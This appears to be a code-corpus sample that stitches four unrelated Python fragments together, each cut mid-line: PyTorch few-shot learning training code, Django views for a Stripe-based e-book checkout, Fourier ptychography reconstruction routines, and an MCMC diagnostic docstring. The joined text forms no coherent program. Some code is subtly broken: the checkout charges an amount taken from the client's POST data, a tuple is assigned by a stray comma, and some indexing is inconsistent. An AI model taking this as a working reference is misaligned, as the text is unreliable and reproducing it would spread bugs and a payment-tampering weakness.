sample_batch_size, feature_channel, feature_width, feature_height = sample_features.shape
batch_batch_size = batch_features.shape[0]
wxh = feature_width * feature_height
sample_features = sample_features.view(sample_batch_size, feature_channel, -1)
batch_features = batch_features.view(batch_batch_size, feature_channel, -1)
# 配对
sample_features_ext = sample_features.unsqueeze(0).repeat(batch_batch_size, 1, 1, 1)
batch_features_ext = batch_features.unsqueeze(0).repeat(self.sample_num_per_class * self.class_num, 1, 1, 1)
batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
# 变换形状
sample_features_ext = sample_features_ext.view(-1, feature_channel, wxh)
batch_features_ext = batch_features_ext.reshape(-1, feature_channel, wxh)
batch_features_ext = torch.transpose(batch_features_ext, 1, 2)
# 求余弦相似度
relation_pairs = torch.matmul(batch_features_ext, sample_features_ext)
relation_pairs = relation_pairs.view(-1, wxh * wxh)
# 计算关系得分
relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
relations = relations.view(-1, self.class_num * self.sample_num_per_class)
return relations, other_sample_features, other_batch_features, other_relation_features
# dilation
def compare_fsl_4(self, samples, batches):
# features
all_sample_features = self.feature_encoder(samples.cuda(), self.is_summary) # 5x64*19*19
sample_features_all, other_sample_features = all_sample_features[: -1], all_sample_features[-1]
all_batch_features = self.feature_encoder(batches.cuda(), self.is_summary) # 75x64*19*19
batch_features_all, other_batch_features = all_batch_features[: -1], all_batch_features[-1]
batch_size, feature_dim, feature_width, feature_height = batch_features_all[0].shape
sample_features_all_ext = []
batch_features_all_ext = []
sample_features_all = [sample_features_all[0], sample_features_all[0], sample_features_all[0],
sample_features_all[1], sample_features_all[1], sample_features_all[1],
sample_features_all[2], sample_features_all[2], sample_features_all[2]]
batch_features_all = [batch_features_all[0], batch_features_all[1], batch_features_all[2],
batch_features_all[0], batch_features_all[1], batch_features_all[2],
batch_features_all[0], batch_features_all[1], batch_features_all[2]]
for sample_features, batch_features in zip(sample_features_all, batch_features_all):
# calculate relations
sample_features_ext = sample_features.unsqueeze(0).repeat(batch_size, 1, 1, 1, 1)
batch_features_ext = batch_features.unsqueeze(0).repeat(
self.sample_num_per_class * self.class_num, 1, 1, 1, 1)
batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
sample_features_all_ext.append(sample_features_ext)
batch_features_all_ext.append(batch_features_ext)
pass
sample_features_all_ext = torch.cat(sample_features_all_ext, 2)
batch_features_all_ext = torch.cat(batch_features_all_ext, 2)
relation_pairs = torch.cat((sample_features_all_ext, batch_features_all_ext),
2).view(-1, feature_dim * 2 * 3 * 3, feature_width, feature_height)
relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
relations = relations.view(-1, self.class_num * self.sample_num_per_class)
return relations, other_sample_features, other_batch_features, other_relation_features
def train(self):
Tools.print()
Tools.print("Training...")
if self.is_summary and self.writer is None:
self.writer = SummaryWriter(self.summary_dir)
pass
all_loss = 0.0
for episode in range(self.train_episode):
# init dataset
task = MiniImageNetTask(self.folders_train, self.class_num,
self.sample_num_per_class, self.batch_num_per_class)
sample_data_loader = MiniImageNet.get_data_loader(task, self.sample_num_per_class, "train",
shuffle=False, data_dict=self.data_dict)
batch_data_loader = MiniImageNet.get_data_loader(task, self.batch_num_per_class, split="val",
shuffle=True, data_dict=self.data_dict)
samples, sample_labels = sample_data_loader.__iter__().next()
batches, batch_labels = batch_data_loader.__iter__().next()
###########################################################################
# calculate features
relations, other_sample_features, other_batch_features, other_relation_features = self.compare_fsl_fn(
self, samples, batches)
# 可视化
self._feature_vision(other_sample_features, other_batch_features, other_relation_features, episode)
###########################################################################
one_hot_labels = torch.zeros(self.batch_num_per_class * self.class_num,
self.class_num).scatter_(1, batch_labels.view(-1, 1), 1).cuda()
loss = self.loss(relations, one_hot_labels)
self.feature_encoder.zero_grad()
self.relation_network.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(self.feature_encoder.parameters(), 0.5)
torch.nn.utils.clip_grad_norm_(self.relation_network.parameters(), 0.5)
self.feature_encoder_optim.step()
self.relation_network_optim.step()
self.feature_encoder_scheduler.step(episode)
self.relation_network_scheduler.step(episode)
if self.is_summary:
self.writer.add_scalar('loss/now-loss', loss.item(), episode)
self.writer.add_scalar('learning-rate', self.feature_encoder_scheduler.get_lr(), episode)
pass
all_loss += loss.item()
if (episode + 1) % self.print_freq == 0:
Tools.print("Episode: {} avg loss: {} loss: {} lr: {}".format(
episode + 1, all_loss / (episode % self.val_freq), loss.item(),
self.feature_encoder_scheduler.get_lr()))
pass
if (episode + 1) % self.val_freq == 0:
Tools.print()
Tools.print("Valing...")
train_accuracy, train_h = runner.val_train(episode, is_print=True)
val_accuracy, val_h = self.val(episode, is_print=True)
if val_accuracy > self.best_accuracy:
self.best_accuracy = val_accuracy
torch.save(self.feature_encoder.state_dict(), self.feature_encoder_dir)
torch.save(self.relation_network.state_dict(), self.relation_network_dir)
Tools.print("Save networks for episode: {}".format(episode))
pass
if self.is_summary:
self.writer.add_scalar('loss/avg-loss', all_loss / (episode % self.val_freq), episode)
self.writer.add_scalar('accuracy/val', val_accuracy, episode)
self.writer.add_scalar('accuracy/train', train_accuracy, episode)
pass
all_loss = 0.0
Tools.print()
pass
pass
pass
def _val(self, folders, sampler_test, all_episode, episode=-1):
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * sp.stats.t._ppf((1 + confidence) / 2., n - 1)
return m, h
accuracies = []
for i in range(all_episode):
total_rewards = 0
counter = 0
# 随机选5类,每类中取出1个作为训练样本,每类取出15个作为测试样本
task = MiniImageNetTask(folders, self.class_num, self.sample_num_per_class, self.batch_num_per_class)
sample_data_loader = MiniImageNet.get_data_loader(task, 1, "train", sampler_test=sampler_test,
shuffle=False, data_dict=self.data_dict)
batch_data_loader = MiniImageNet.get_data_loader(task, 3, "val", sampler_test=sampler_test,
shuffle=True, data_dict=self.data_dict)
samples, labels = sample_data_loader.__iter__().next()
for batches, batch_labels in batch_data_loader:
###########################################################################
# calculate features
relations, other_sample_features, other_batch_features, other_relation_features = self.compare_fsl_fn(
self, samples, batches)
# 可视化
is_vision = False if episode > 0 else True
episode = episode if | |
import json
import os
import stripe
from django.contrib import messages
from django.conf import settings
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import mail_admins
from django.db import IntegrityError
from django.http import JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from books import forms, helpers, coupon_codes
from books.models import Customer
stripe.api_key = os.environ['STRIPE_SECRET']
# TODO: Set up something so people who made accounts but haven't bought
# anything are tracked.
# TODO: This view should be renamed to log in or create account
def upsell(request, product_slug=None):
# User is logged in, go straight to buy page (as long as they're not a
# gifted user or someone who made a log in but hasn't bought yet.)
if request.user.is_authenticated and 'giftee_user' not in request.session and 'brand_new_user' not in request.session:
return redirect('/charge/%s' % product_slug + '?coupon=customerfriend')
# if they went through upsell page but haven't bought anything, go to charge
# page without the coupon
if request.user.is_authenticated and 'brand_new_user' in request.session:
return redirect('/charge/%s' % product_slug)
# grab coupon if supplied
coupon_supplied = request.GET.get("coupon", None)
# Get someone to log in OR create an account
form_class = forms.AddEmailForm
if request.method == 'POST':
request.session.pop('brand_new_user', None)
form = form_class(request.POST)
if form.is_valid():
email = form.cleaned_data['email']
password = form.cleaned_data['password']
username = email.replace("@", "").replace(".", "")
# check to see if they already have an account
user = authenticate(username=username, password=password)
if not user:
# no user returned by authenticate either means wrong password
# or no account
try:
User.objects.get(email=email)
except ObjectDoesNotExist:
# create new account
user = User.objects.create_user(
username=username,
email=email,
password=password,
)
request.session['brand_new_user'] = True
# FIXME: Maybe don't log in the person? Because then
# if they return to the page, it gives them a discount
login(request, user)
if coupon_supplied:
return redirect('/charge/' + product_slug + '/?coupon=' + coupon_supplied)
return redirect('charge', product_slug=product_slug)
# user wasn't found but the email exists in the system, so their
# password must be wrong (or something)
messages.error(request, 'Email address found in system but password did not match. Try again?')
if coupon_supplied:
return redirect('/buy/' + product_slug + '/?coupon=' + coupon_supplied)
return redirect('upsell', product_slug=product_slug)
else:
# existing user was found and logged in
login(request, user)
if coupon_supplied:
return redirect('/charge/%s' % product_slug + '/?coupon=' + coupon_supplied)
return redirect('/charge/%s' % product_slug + '/?coupon=customerfriend')
else:
form = form_class()
return render(request, 'order/upsell.html', {
'form': form,
'product': product_slug,
'coupon_supplied': coupon_supplied,
})
def gift(request, product_slug):
if request.method == 'POST':
email = request.POST['gifteeEmail']
message = request.POST['gifteeMessage']
username = email.replace("@", "").replace(".", "")
# FIXME: What should we do if someone *already* has an account?
# Need to create a backend so I can log into the user without a
# password re: https://stackoverflow.com/questions/6560182/django-authentication-without-a-password
# PUNTING for now
# Make sure there isn't a user account for this yet.
try:
User.objects.get(email=email)
except ObjectDoesNotExist:
request.session['giftee_user'] = username
request.session['giftee_email'] = email
request.session['giftee_message'] = message
return redirect('charge', product_slug=product_slug)
mail_admins("Bad happenings on HWB", "Attempting to gift a product to someone who already has an account.")
messages.error(request, "That person already has an account on Hello Web Books! This is a use-case that Tracy hasn't written the code for yet (whoops.) Please email <EMAIL> and she'll set it up manually with a discount for your trouble.")
return redirect('upsell', product_slug=product_slug)
messages.error(request, 'How did you get here? Email <EMAIL> if you need help!')
return redirect('order')
def charge(request, product_slug=None):
user = request.user
if not user.is_authenticated and 'giftee_user' not in request.session:
messages.error(request, "Please choose a product and sign in or create an account first.")
return redirect('order')
# grab coupon if supplied
coupon_supplied = request.GET.get("coupon", None)
amount, product_name, us_postage, can_postage, aus_postage, eur_postage, else_postage, paperback_price = helpers.product_details(product_slug)
product_obj, product_obj2, paperback, video, supplement = helpers.product_split(product_slug)
if request.method == "POST":
gifted_product = False
source = request.POST['stripeToken']
amount = int(float(request.POST['paymentAmount'])) # rounds down in case of half numbers
coupon = request.POST['stripeCoupon'] or ""
has_paperback = False
if request.POST['hasPaperback'] == 'true':
has_paperback = True
args = json.loads(request.POST['stripeArgs'])
shipping = helpers.shipping_details(args)
# Check whether this is a gifted product
if 'giftee_user' in request.session:
try:
user = User.objects.create_user(
username=request.session['giftee_user'],
email=request.session['giftee_email'],
password=User.objects.make_random_password(),
)
gifted_product = True
except IntegrityError as e:
mail_admins("Bad happenings on HWB", "Attempting to gift a product to someone who already has an account.")
messages.error(request, "That person already has an account on Hello Web Books! This is a use-case that Tracy hasn't written the code for yet (whoops.) Please email <EMAIL> and she'll set it up manually with a discount for your trouble.")
return redirect('order')
# See if they're already a customer if this is not a gift
existing_customer = False
gifted_customer = False
if not gifted_product:
try:
customer = Customer.objects.get(user=request.user)
id = customer.stripe_id
existing_customer = True
if customer.gift:
gifted_customer = True
except Customer.DoesNotExist: # New customer
pass
# if the customer is buying something and their account was gifted,
# the stripe customer needs to be wiped and replaced with a new customer
if gifted_customer:
# retrieve listing from stripe, delete
cu = stripe.Customer.retrieve(customer.stripe_id)
try:
cu.delete()
except stripe.error.InvalidRequestError:
# customer not found on Stripe's end, might have already been deleted
pass
# create the stripe customer for the gifted-user or the new-user
if gifted_product or not existing_customer or gifted_customer or not id:
# XXX: confirm that the customer object of gifter is overridden by
# the new customer object in Stripe
id = helpers.create_stripe_customer(request, product_slug, user, source, shipping, coupon)
# charge the customer
try:
charge = stripe.Charge.create(
customer=id,
amount=amount, # set above POST
currency='usd',
description=product_name,
shipping=shipping,
)
except stripe.error.CardError as e:
body = e.json_body
err = body.get('error', {})
messages.error(request, err.get('message'))
return redirect('charge', product_slug=product_slug)
except stripe.error.InvalidRequestError as e:
messages.error(request, "Sorry, an error has occured! We've been emailed this issue and will be on it within 24 hours. If you'd like to know when we've fixed it, email <EMAIL>. Our sincere apologies.")
mail_admins("Stripe Invalid Request Errror on HWB", "Payment failure for [%s] - [%s]" % (user.email, e))
return redirect('charge', product_slug=product_slug)
except stripe.error.StripeError as e:
messages.error(request, "Sorry, an error has occured! We've been emailed this issue and will be on it within 24 hours. If you'd like to know when we've fixed it, email <EMAIL>. Our sincere apologies.")
mail_admins("Bad happenings on HWB", "Payment failure for [%s] - [%s]" % (user.email, e))
return redirect('charge', product_slug=product_slug)
if not existing_customer:
customer = Customer(
stripe_id = id,
last_4_digits = charge.source.last4,
user = user,
gift = gifted_product, # if this is a gifted product, then this'll be set to true
)
# gifted customer should have added their credit card by now, so we can
# update their Customer object
if gifted_customer or not customer.stripe_id:
customer.stripe_id = id
customer.last_4_digits = charge.source.last4,
customer.gift = False
# overwrite coupon if another is used
if coupon:
customer.coupon = coupon
customer.save()
# save the memberships in the database
helpers.new_account_memberships(supplement, has_paperback, video, customer, product_obj, product_obj2)
# send success email to admin
helpers.send_admin_charge_success_email(user.email, product_name, has_paperback, supplement, gifted_product)
if not settings.DEBUG:
# subscribe the person to convertkit
helpers.subscribe_to_newsletter(user.email, product_slug, has_paperback)
# invite the person into the slack channel
#helpers.invite_to_slack(user.email, product_name)
# if this is a gifted product, send the person a gift email
if 'giftee_user' in request.session:
helpers.send_giftee_password_reset(
request,
user.email,
product_name,
'registration/giftee_password_reset_subject.txt',
'registration/giftee_password_reset_email.txt',
request.session.get('giftee_message'),
)
logout(request)
messages.success(request, "Success! We've sent an email to your giftee with how to access their files.")
request.session.pop('giftee_user', None)
return redirect('order')
# log in customer, redirect to their dashboard
messages.success(request, "Success! You can access your product below.")
request.session.pop('brand_new_user', None)
return redirect('dashboard')
else:
form = forms.StripePaymentForm()
return render(request, "order/charge.html", {
'form': form,
'publishable_key': settings.STRIPE_PUBLISHABLE,
'product': product_slug,
'paperback': paperback,
'paperback_price': paperback_price,
'amount': amount,
'product_name': product_name,
'us_postage': us_postage,
'can_postage': can_postage,
'eur_postage': eur_postage,
'aus_postage': aus_postage,
'else_postage': else_postage,
'coupon_supplied': coupon_supplied,
})
@login_required
def check_coupon(request):
coupon = request.GET.get("coupon")
format = request.GET.get("format")
discount = 0
if coupon in coupon_codes.COUPON_LOOKUP:
discount = coupon_codes.COUPON_LOOKUP[coupon]
if format == 'json':
data = {
'status': 'ok',
'discount': discount,
}
return JsonResponse(data)
data = {
'status': 'fail',
}
return JsonResponse(data)
@login_required
def charge_update(request):
user = request.user
customer = get_object_or_404(Customer, user=user)
last_4_digits = customer.last_4_digits
if request.method == "POST":
form = forms.StripePaymentForm(request.POST)
if form.is_valid(): # charges the card
cu = stripe.Customer.retrieve(customer.stripe_id)
| |
same length as x
Optional parameters:
funcVal_only: boolean variable, function returns fval only if true
forward_only: boolean variable, the function returns Ax only if true, else
returns both Ax and gradient
"""
if frames_to_process is None:
frames_to_process = range(self.n_frames)
elif (type(frames_to_process) is not list) and type(frames_to_process) is not range and type(frames_to_process) is not np.arange:
frames_to_process = [frames_to_process]
# Forward model is a list of images
Ax = np.zeros([len(frames_to_process), self.m_crop, self.n_crop])
# Apply forward model to images (allow multiplexing)
for frame_index in range(len(frames_to_process)):
for led_index in range(len(self.cropystart[frame_index])):
Ax[frame_index, :, :] += np.abs(self.iF(self.objf[self.cropystart[frame_index][led_index][0]:self.cropyend[frame_index][led_index][0],
self.cropxstart[frame_index][led_index][0]:self.cropxend[frame_index][led_index][0]] * self.pupil))
if forward_only:
return Ax.ravel()
# Compute Cost
fval = 0
for frame_index in range(len(frames_to_process)):
fval += la.norm(np.sqrt(self.frame_list[frame_index, :, :].ravel()) - Ax[frame_index, :, :].ravel()) ** 2
# Compute gradient
if funcVal_only:
return fval
else:
mask = np.zeros([len(frames_to_process), self.M, self.N], dtype=np.bool)
gradient_list = []
mask_list = []
gradient = np.zeros([self.M, self.N], dtype="complex128")
for index, frame_index in enumerate(frames_to_process):
gradient *= 0 # Set gradient to zero
for led_index in range(len(self.cropystart[frame_index])):
objfcrop_p = self.objf[self.cropystart[frame_index][led_index][0]:self.cropyend[frame_index][led_index][0],
self.cropxstart[frame_index][led_index][0]:self.cropxend[frame_index][led_index][0]] * self.pupil
objfcrop_ampsub = self.F(np.sqrt(self.frame_list[frame_index, :, :]) * np.exp(1j * np.angle(self.iF(objfcrop_p))))
gradient[self.cropystart[frame_index][led_index][0]:self.cropyend[frame_index][led_index][0],
self.cropxstart[frame_index][led_index][0]:self.cropxend[frame_index][led_index][0]] += np.conj(self.pupil) * (objfcrop_ampsub - objfcrop_p)
mask_list.append(np.abs(gradient) > 0)
gradient_list.append(gradient[np.abs(gradient) > 0])
return(gradient_list, mask_list), fval
def applyHessianSeq(self, x, idx, obj):
"""
This function applies the local Hessian operator to point x
The Hessian operator is evaluated at current point obj
Input:
x: 1D complex array point to which local Hessian is applied
obj: global object to be cropped corresponding to index idx
Return:
Hx: 1D complex array, same type as x
"""
x = np.reshape(x, [self.m_crop, self.n_crop])
Hx = x.copy()
N = float(x.size)
g = self.iF(self.pupil * obj[self.cropystart[idx][0]:self.cropyend[idx][0],
self.cropxstart[idx][0]:self.cropxend[idx][0]])
g_norm = np.exp(1j * np.angle(g)) ** 2
Hx = 1/4./N * np.abs(self.pupil) ** 2 * x + \
1/4./N * np.conjugate(self.pupil) * self.F((np.exp(1j * np.angle(g)) ** 2) * self.F(np.conjugate(self.pupil)*np.conjugate(x)))
Hx += self.options.lm_delta2 * x
return Hx.ravel()
def applyHessianGlobal(self, x, idx=None):
"""
This function applies the global Hessian operator to point x
The Hessian operator is evaluated at current point self.objf
Input:
x: 1D complex array point to which global Hessian is applied
Return:
Hx: 1D complex array, same type as x
"""
if idx is None:
frames_to_process = range(self.n_frames)
else:
frames_to_process = [idx]
x = np.reshape(x, [self.M, self.N])
Hx = np.zeros([self.M, self.N], dtype="complex128")
for p_img in frames_to_process:
frame_index = frames_to_process[p_img]
gl = self.objcrop[frame_index, 0, :, :] #added another index for led_idx
objcrop_p = self.iF(x[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] * self.pupil)
HOO = np.conj(self.pupil) * self.F(objcrop_p - 0.5 * np.sqrt(self.frame_list[frame_index, :, :])/(np.abs(gl) + 1e-15) * objcrop_p)
HOtO = 0.5 * np.conj(self.pupil) * self.F(np.sqrt(self.frame_list[frame_index, :, :]) * (gl ** 2) / (np.abs(gl) ** 3 + 1e-15) * objcrop_p.conj())
Hx[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] += HOO + HOtO
Hx = (Hx / float(self.n_frames) + self.options.lm_delta2 * x)
Hx.shape = (Hx.size, 1)
return Hx
def run(self, n_iter=None):
"""
This function reconstructs object
max_it is set very high by default so it will be ignored.
"""
# Use max iteration from options or if user supplies
if n_iter is None:
n_iter = self.options.max_it - self.current_itr
if self.current_itr + n_iter > self.options.max_it:
print("Reached max iteration.")
else:
# Compute and print cost
self.cost[0] = self.Afunc(funcVal_only=True, frames_to_process=range(self.n_frames))
# Plot initial
if self.current_itr == 0:
if not self.options.quiet:
if not self.options.live_plot:
print(displaytools.Color.BLUE + "| Iter | Cost | Elapsed time (sec) | Auto-calib norm | " + displaytools.Color.END)
print("|% 5d | %.02e | % 7.2f | % 4.2f |" % (0, self.cost[0], 0., 0.))
else:
self.plotter = FpmPlot(self, figsize = self.options.live_plot_figure_size, figaspect=self.options.live_plot_aspect)
t_start = time.time()
if self.options.algorithm == "seq_nesterov":
objfcrop_hist = np.zeros((self.n_frames, self.m_crop, self.n_crop), dtype="complex128")
for iter in range(n_iter):
if (self.current_itr in self.options.led_auto_calib_itr_range) & self.options.led_auto_calib_enabled:
source_list_na_prev = self.crop2na()
# Store previous objf (for global algorithms)
objf_prev = self.objf
# Switch based on method
if self.options.algorithm == "seq_gerchberg_saxton":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
# Amplitude substitution
objfcrop = self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]]
objfcrop_ampsub = self.F((np.sqrt(self.frame_list[frame_index, :, :]) * np.exp(1j * np.angle(self.iF(objfcrop * self.pupil)))))
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= (objfcrop - objfcrop_ampsub) * self.pupil
elif self.options.algorithm == "seq_gd":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
# Amplitude substitution
# (grad_list, mask_list), fval = self.Afunc(frames_to_process=frame_index)
#
# for index, gradient in enumerate(grad_list):
# self.objf[mask_list[index]] -= self.options.alg_gd_step_size * gradient
gradient, fval = self.Afunc(frames_to_process=frame_index)
# objfcrop = self.objf[self.cropystart[i_img][0]:self.cropyend[i_img][0],
# self.cropxstart[i_img][0]:self.cropxend[i_img][0]]
# gradient = np.reshape(gradient, [self.m_crop, self.n_crop])
# self.objf[self.cropystart[frame_index][0][0]:self.cropyend[frame_index][0][0],
# self.cropxstart[frame_index][0][0]:self.cropxend[frame_index][0][0]] -= self.options.alg_gd_step_size * gradient
self.objf -= self.options.alg_gd_step_size * gradient
elif self.options.algorithm == "seq_nesterov":
for frame_index in range(self.n_frames):
objfcrop = self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]]
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
if self.current_itr == 0:
objfcrop_hist[frame_index:, :] = objfcrop
gradient = self.Afunc(self.objf, idx=frame_index)[0]
gradient = np.reshape(gradient, [self.m_crop, self.n_crop])
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= self.options.alg_nest_alpha * gradient
else:
objfcrop_d = objfcrop - objfcrop_hist[frame_index, :, :]
objfcrop_hist[frame_index, :, :] = objfcrop
objf_mom = self.objf.copy()
objf_mom[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] = objfcrop + self.options.alg_nest_beta * objfcrop_d
gradient = self.Afunc(objf_mom, idx=frame_index)[0].reshape([self.m_crop, self.n_crop])
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= (self.options.alg_nest_alpha * gradient - self.options.alg_nest_beta * objfcrop_d)
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
elif self.options.algorithm == "seq_lma_approx":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
gradient = self.Afunc(self.objf, idx=frame_index)[0]
gradient = np.reshape(gradient, [self.m_crop, self.n_crop])
step_size = np.abs(self.pupil) / np.max(np.abs(self.pupil.ravel()))
hinv_approx = 1. / (np.abs(self.pupil) ** 2 + self.options.lm_delta2)
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] -= step_size * hinv_approx * gradient
elif self.options.algorithm == "seq_lma":
for frame_index in range(self.n_frames):
# Self-calibration inner loop
if self.options.led_auto_calib_enabled and self.current_itr in self.options.led_auto_calib_itr_range:
self.findLedNaError(leds_to_process=frame_index)
if self.options.led_auto_calib_rigid_trans_every_led:
self.fitLedNaToRigidTransform(leds_to_process=range(frame_index + 1), boards_to_process=self.source_list_board_idx[frame_index])
gradient = self.Afunc(self.objf, idx=frame_index)[0]
step_size = np.abs(self.pupil) / np.max(np.abs(np.reshape(self.pupil, -1)))
curr_hessian = lambda x: self.applyHessianSeq(x, frame_index, self.objf)
descent_dir = algorithms.cg(curr_hessian, -gradient, maxIter=50)[0]
descent_dir = np.reshape(descent_dir, [self.m_crop, self.n_crop])
self.objf[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] += 0.5 * step_size * descent_dir
elif self.options.algorithm == "global_gd":
if self.current_itr > 0: # Running this during the first iteration doesn't make sense
# LED Auto-calibration
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
source_list_na_prev = np.asarray(self.crop2na())
self.findLedNaError(leds_to_process=-1)
if self.options.led_auto_calib_rigid_trans:
self.fitLedNaToRigidTransform()
self.source_list_na = np.asarray(self.crop2na())
print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na - source_list_na_prev))
if self.options.led_auto_calib_add_error_na > 0.0:
print("Auto-calibration error is: %.02f" % np.linalg.norm(self.source_list_na - self.source_list_na_design))
(grad_list, mask), fval = self.Afunc(frames_to_process=range(self.n_frames))
for gradient_index, gradient in enumerate(grad_list):
self.objf[mask[gradient_index, :, :]] += self.options.alg_gd_step_size * gradient
elif self.options.algorithm == "global_nesterov":
objf_d = self.objf - objf_prev
objf_prev = self.objf.copy()
gradient = self.Afunc((self.objf + self.options.alg_nest_beta * objf_d))[0]
gradient = np.reshape(gradient, [self.M, self.N])
self.objf -= (self.options.alg_nest_alpha * gradient - self.options.alg_nest_beta * objf_d)
self.obj[self.current_itr + 1, :, :] = self.iF(self.objf) * (self.scale ** 2)
self.cost[self.current_itr + 1] = self.Afunc(self.objf, funcVal_only=True)
# LED Auto-calibration
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
print("Performing Auto-calibration")
source_list_na_prev = self.crop2na()
self.findLedNaError(leds_to_process=-1)
print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na - self.source_list_na_prev))
elif self.options.algorithm == "global_lbfgs":
raise NotImplementedError("lbfgs needs to be modified to work with single-class model.")
# self.frame_list_it = 0
#
# def compute_l_bfgs_cost(x):
#
# # LED Auto-calibration
# if self.options.led_auto_calib_enabled:
# if self.current_itr in self.options.led_auto_calib_itr_range:
# print("Performing Auto-calibration")
# source_list_na_prev = self.crop2na()
# self.findLedNaError(leds_to_process=-1)
# print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na_up - self.source_list_na_prev))
#
# self.frame_list_it += 1
# self.cost[self.frame_list_it] = self.Afunc(x, funcVal_only=True)
# self.objf = np.reshape(x, [self.M, self.N]).copy()
# self.obj[self.frame_list_it, :, :] = self.iF(self.objf) * (self.scale ** 2)
# print("| %02d | %.02e | %.02f |" % (self.frame_list_it, self.cost[self.frame_list_it], time.time() - t_start))
# x0 = self.objf.ravel()
# x, f, d = algorithms.lbfgs(self.Afunc, x0, iprint=1, maxiter=self.maxit-1, disp=1, callback=compute_l_bfgs_cost)
# iter = np.minimum(d["nit"], self.maxit)
# self.cost = self.cost[0:iter + 1]
# self.obj = self.obj[:iter + 1, :, :]
elif self.options.algorithm == "global_newton":
# LED Auto-calibration
if self.options.led_auto_calib_enabled:
if self.current_itr in self.options.led_auto_calib_itr_range:
print("Performing Auto-calibration")
source_list_na_prev = self.crop2na()
if self.options.led_auto_calib_rigid_trans:
self.findLedNaError(leds_to_process=-1)
self.fitLedNaToRigidTransform()
print("Auto-calibration norm: %.02f" % np.linalg.norm(self.source_list_na - self.source_list_na_prev))
gradient, fval = self.Afunc(self.objf)
descent_dir, info = algorithms.cgs(self.applyHessianGlobal, -gradient, maxiter=100, tol=1e-8)
descent_dir = descent_dir.ravel()
x0 = self.objf.ravel()
x, step_size = algorithms._linesearch(self.Afunc, x0, descent_dir, gradient, t=0.05,
stepSize0=200, gamma=0.8, funcVal_last=fval)[0:2]
self.objf = np.reshape(x, [self.M, self.N]).copy()
| |
1]. The level of accuracy in the quantile estimate.
Default is 0.005.
s : float, optional
A float in [0, 1]. The probability of attaining accuracy ``r`` of the
quantile ``q``. Default is 0.95.
axis : int
The axis along which to compute the test. Default is 0, it is computed
for all other axes simultaneously along axis 0.
References
----------
Raftery, <NAME>. and Lewis, <NAME>. (1992). "How Many Iterations in the
Gibbs Sampler?" In Bayesian Statistics, Vol. 4 (<NAME>, <NAME>,
<NAME> and <NAME>, eds.). Oxford, U.K.: Oxford University Press,
763-773.
Raftery, <NAME>. and Lewis, <NAME>. (1995). "The Number of Iterations,
Convergence Diagnostics and Generic Metropolis Algorithms." In Practical
Markov Chain Monte Carlo (<NAME>, <NAME> and <NAME>,
eds.). London, U.K.: Chapman and Hall.
Raftery, <NAME>. and Lewis, <NAME>. (1995). "Gibbsit", version 2.0.
URL: http://lib.stat.cmu.edu/general/gibbsit. Visited: 2017-08-18.
Examples
--------
>>> import parsimony.utils.mcmc as mcmc
>>> import numpy as np
>>> np.random.seed(1)
>>>
>>> N = 4000
>>> X = np.cumprod(np.r_[[1.0], 1.0 + np.random.randn(N) / (100 + np.arange(N)**1.1)])
>>> # import matplotlib.pyplot as plt; plt.figure(); plt.plot(X); plt.show()
